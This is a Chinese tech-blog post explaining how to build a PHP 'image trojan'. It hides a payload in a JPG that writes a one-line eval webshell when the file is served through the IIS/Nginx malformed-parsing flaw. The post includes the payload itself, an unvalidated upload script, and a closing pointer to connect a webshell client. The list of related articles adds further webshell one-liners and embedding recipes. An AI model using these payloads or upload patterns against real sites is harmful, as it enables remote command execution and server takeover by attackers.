2017-11-03-PHP图片木马

最新推荐文章于 2023-08-20 17:05:58 发布
最新推荐文章于 2023-08-20 17:05:58 发布
阅读量786 收藏
点赞数
文章标签: php java git python laravel
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41811317/article/details/105660773
版权
layouttitledateauthordescin_head
post
PHP图片木马
2017-11-03 09:03:02 +0800
Q九
本测试主要针对的是 IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞 基于Windows系统的
<style> .article-content p{ text-indent: 2em; line-height: 1.75rem; }</style>

PHP图片木马 实现

运行环境介绍

本测试主要针对的是 IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的 在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

的文件,然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马 shell.php

实验过程

制作图片木马

使用windows自带的 cmd 命令行进行图片木马的制作

A.如下图所示:

准备两个文件 一个 正常的图片文件 一个 一句话木马文件

B.如下图所示:

运行上图所写的命令 会把两个文件合成一个文件 如下图所示:

会看到文件大小 会变化

然后用记事本打开两个图片就会发现 图片内容发生改变如图

至此 一句话木马图片制造完毕!

接下来我们准备测试的代码 :

如图所示 我们准备一个 上传文件的表单 代码如下:

<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
<form action="./2.php" method="post" enctype="multipart/form-data">
    <input type="file" name="pic" id="">
    <button type="submit">上传</button>
</form>
</body>
</html>

再准备一个2.php 文件 用来处理上传图片,代码如下:

<?php
$file = $_FILES['pic'];
move_uploaded_file($file['tmp_name'],__DIR__.'/1.jpg');

开始试验

OK! 开始运行代码,上传我们生成的图片木马,上传完毕以后 如下图所示:

然后我们直接在浏览器中访问图片1.jpg 会看到图片正常显示, 接下来 我们访问图片的时候 路径 如图所示

就会发现 在当前文件夹中生成一个 shell.php内容如下 :

试验完毕

ok 剩下的就是上菜刀了!

PFinal社区-【南丞】
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php中的上传图片,php中文件上传图片
weixin_35900054的博客
03-17 178
要实现文件上传图片我们需要写出两个php文件,第一个php文件我们需要写出一个文件上传的页面,第二个php文件我们写出实现图片上传的功能无标题文档文件上传var_dump($_FILES["file"]);// 限制文件的类型// 限制文件的大小// 防止文件名重复// 一.防止文件名重复// 1.修改文件名// 流水号,时间戳+随机数+用户名// 2.建文件夹// ...
php的简单文件上传整理
HoeWang的博客
02-26 349
##文件上传1.在表单头要写入enctype="multipart/form-data";2.最好定义一个隐藏的hidden,name="MAX_FILE_SIZE"value来定义大小##使用到的函数1.is_uploaded_file用来判定文件是否是通过HTTP-HOST上传的,返回bool值2.move_uploaded_file('临时文件路径','目标文件路径')其中临时文件路径是指$...
PHP 图片木马隐写方法及靶机演示
百彦子烨的博客
11-11 3246
通常在木马的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上传图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木马隐藏到图片中,以此来绕过防御,进行上传。
制作图片马四种方式 cmd中 copy 1.jpg/b+2.php 3.jpg /b是二进制形式打开 /a是ascii方式打开 看到有人说一定要把图片放前面,木马放后面才能
为了低调的博客
08-20 1454
看到有人说一定要把图片放前面,木马放后面才能成功,我亲自试了这两种制作方式(另一种图片放后面),均能成功连接,但是后者的一句话木马在文件开头,不推荐!/a是ascii方式打开。/b是二进制形式打开。
web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 5913
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
php检测图片木马多进制编程实践
01-20
其实一开始我什么也不知道,只是后来在网上查了一些资料,找到的全是有制作图片木马的教程,并没有找到检测的程序。 经过几番思索之后,决定从制作原理来分析这种木马程序。这种木马程序是十六进制编码写的,我灵机...
PHP检测本地图片是否有木马
04-20
也可以用linux服务器上的木马扫描软件,比如 Clamav 支持命令行执行的,上传之后就扫一下,最可靠, $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = ...
元搜-聚合搜索引擎 v1.0.rar
07-07
⑶安全检测,通过本功能可以自动设置网站里所有文件、文件夹的权限以及查出网站里是否有病毒/木马! 6、安全退出后台:退出后台可别忘了点一下这里呵! 7、查看服务器信息:这个功能就类似于phpinfo一样的,就不...
jQuery按钮控制叠加图片旋转木马切换效果.zip
07-11
实现效果: jQuery按钮控制叠加图片旋转木马切换效果,通过按钮控制图片叠加的一个效果,轮播图也可以是这样的效果,适合企业网站或者商城网站的使用,php中文网推荐下载!
PHP 木马攻击防御技巧
12-18
1、防止跳出web目录 首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行...
图片php木马制作教程,图片木马制作大法
weixin_39708854的博客
03-28 2527
0x01什么是图片木马图片木马在网络上没有统一的定义,在这里我给出自己的定义。图片木马是一张能正常显示又包含恶意代码(比如一句话木马)的图片文件。根据定义我们知道图片木马两个条件:图片能正常显示包含能执行的而已代码总体思路:将恶意代码写在图片文件中非图片数据区,防止写入导致图片损坏。常规的图片格式有gif,png,jpg格式0x02将恶意代码写在图片尾部适合格式:任何图片格式方法一:copy法准...
php图片一句话木马使用方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-25 2227
php图片一句话木马使用方法,PHP一句话: 1、标准的写法,直接通过eval执行php代码@eval ($_POST['code']); 2、动态执行assert生成一个木马文件(隐藏性最好的一种)@$_GET['a']($_GET['code']); 3、使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Y
如何把图片木马改成php格式,铭说 | 一句话木马的多种变形方式
weixin_29775951的博客
04-09 918
原标题:铭说 | 一句话木马的多种变形方式今天来和大家聊一聊,一句话木马的多种变形方式。经常有客户的网站碰到被上传小马和大马,这里的“马”是木马的意思,可不是真实的马。通常,攻击者利用文件上传漏洞,上传一个可执行并且能被解析的脚本文件,通过这个脚本来获得服务器端执行命令的能力,也就是我们经常听到的WebShell,而这个脚本文件就是我们常说的大马和小马。1、都有些什么“马”?小马体积小,功能少,优...
图片木马制作方法详细教程
爱吃仡坨的Blog
10-24 8721
将写的木马插入到图片中,之后配合解析漏洞.htaccess等,对图片马进行解析,从而执行图片中的恶意代码;# 因此 服务器是对文件后缀来对文件进行解析的,所以我们可以通过修改文件后缀来对图片进行访问。此时生成的是图片文件,我们将后缀改为zip时,任然可以读取压缩包文件中的内容。先将一张图片放到PS中,之后点击左上角文件——>文件简介。通过十六进制编辑器,将一句话木马写入图片中。通过图片隐藏信息,是一个合成的过程。最后将带有一句话木马图片导出。图片越小的文件,制作工艺越纯良。把压缩包放到图片中,进行合成。
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
ChenD的学习笔记
10-23 7001
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
php 图片木马,php图片木马实现原理
weixin_27310417的博客
03-09 4304
什么是木马木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。那,php的木马是长什么样的呢?我们来看下面这段代码:...
thinkphp图片上传+validate表单验证+图片木马检测+缩略图生成
weixin_30929011的博客
02-16 305
    目录 1.案例   1.1图片上传    1.2进行图片木马检测    1.3缩略图生成    1.4控制器中调用缩略图生成方法 1.案例   前言:在thinkphp框架的Thinkphp/Library/Think文件中有Upload.class.php(文件上传类),我们上传文件或者图片都要用到这个类   1.1图片上传   HTML代码 &...
upload -labs pass17
qq_45106794的博客
11-07 568
#upload -labs pass17 ####################### unlink() 函数删除文件。 若成功,则返回 true,失败则返回 false。 语法 unlink(filename,context) ####################### $is_upload = false; $msg = null; if(isset($_POST['submit']...
图片木马-渗透测试
h0ers的博客
10-28 2703
制作图片木马中的问题 问题 :copy命令制作图片木马后,菜刀无法连接 1.执行步骤: 一张普通图片:1.jpg php版本一句话木马,保存为 1.php,代码如下: <?php @eval($_POST['pass']);?> 制作图片木马,将图片文件和php文件合并为2.jpg,命令如下: copy 1.jpg/b+1.php/a 2.jpg 其中 /b代表二进制文件,/a代表ASCII码文件 上传成功后,用菜刀连接,弹出成功获取图片,未拿到webshell。 2.问题排查 用HxD h
php一句话木马图片
最新发布
01-30
下面是一个示例,展示了如何在PHP一句话木马中使用图片马的方法: ```php <?php $cmd = $_GET['cmd']; // 通过GET请求获取命令 // 执行命令并返回结果 $result = shell_exec($cmd); // 将结果输出到图片文件 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值